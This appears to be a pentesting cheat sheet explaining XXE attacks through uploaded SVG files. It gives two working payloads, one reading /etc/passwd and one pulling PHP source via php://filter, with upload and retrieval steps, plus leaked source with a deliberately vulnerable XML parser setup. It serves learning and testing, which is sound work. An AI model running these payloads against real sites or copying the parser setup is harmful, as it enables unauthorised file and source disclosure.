XML EXTERNAL ENTITY (XXE)
a security vulnerability that occurs when an application processes XML input containing references to external entities. If the XML parser is improperly configured, attackers can exploit XXE to access sensitive data, perform server-side request forgery (SSRF), or even execute arbitrary code. this method can be applied to web applications that allows the upload of XML documents
READING SYSTEM FILES
root@oco:~$ nano svgImage.svg
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
&xxe;
</svg>
* line 1 <?xml...> is a required standard declaration for XML documents
- it declares that the document is an XML file following version 1.0 of the XML standard, with UTF-8 character encoding
* line 2 <!DOCTYPE...> declares a Document Type Definition (DTD) for the XML document. It defines the structure and entities used in the document
- the <!ENTITY xxe...> defines an external entity named xxe.
- this is the payload
* line 3 <svg xmlns...> is the root element for the SVG file
- it defines the parameters of the SVG image
* line 4 <rect...> defines a rectangle in the SVG
* line 5 &xxe; is a reference to the external entity xxe defined in the DTD
- When the XML parser processes this file, it will replace &xxe; with the contents of /etc/passwd.
root@oco:~$ BROWSER {targetSite:port}
upload form: svgImage.svg
* once uploaded, the xxe payload will trigger
root@oco:~$ BROWSER {targetSite:port} > CTRL+U
* ALT: root@oco:~$ curl -v http://{targetSite:port}
* the triggered payload can be viewed by viewing the page's source codeREAD SOURCE IN PHP WEBAPPS
root@oco:~$ nano svgImage.svg
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
&xxe;
</svg>
root@oco:~$ BROWSER {targetSite:port}
upload form: svgImage.svg
* once uploaded, the xxe payload will trigger
root@oco:~$ curl -v http://{targetSite:port}
* the content will be base64 encoded; retrieve it decode
root@oco:~$ echo PD9waHAKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7Cgokc3ZnX2ZpbGUgPSBmaWxlX2dldF9jb250ZW50cygnLi9pbWFnZXMvJyAuIGZpbGVfZ2V0X2NvbnRlbnRzKCcuL2ltYWdlcy9sYXRlc3QueG1sJykpOwokZG9jID0gbmV3IERPTURvY3VtZW50KCk7CiRkb2MtPmxvYWRYTUwoJHN2Z19maWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CiRzdmcgPSAkZG9jLT5nZXRFbGVtZW50c0J5VGFnTmFtZSgnc3ZnJyk7Cj8+Cgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPgoKPGhlYWQ+CiAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogIDx0aXRsZT5FbXBsb3llZSBGaWxlIE1hbmFnZXI8L3RpdGxlPgogIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLi9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICA8c2NyaXB0IHNyYz0naHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMS4zL2pxdWVyeS5taW4uanMnPjwvc2NyaXB0PgogIDxzY3JpcHQgc3JjPSIuL3NjcmlwdC5qcyI+PC9zY3JpcHQ+CiAgPGRpdj4KICAgIDxoMT5VcGRhdGUgeW91ciBsb2dvPC9oMT4KICAgIDxjZW50ZXI+CiAgICAgIDxmb3JtIGFjdGlvbj0idXBsb2FkLnBocCIgbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBpZD0idXBsb2FkRm9ybSI+CiAgICAgICAgPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9hZEZpbGUiIGlkPSJ1cGxvYWRGaWxlIiBhY2NlcHQ9Ii5zdmciPgogICAgICAgIDw/cGhwIGVjaG8gJHN2Zy0+aXRlbSgwKS0+QzE0TigpOyA/PgogICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIGlkPSJzdWJtaXQiPgogICAgICA8L2Zvcm0+CiAgICA8L2NlbnRlcj4KICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPg== | base64 -d
* decoding the ba64 encoded string will enable you to read the sourceLast updated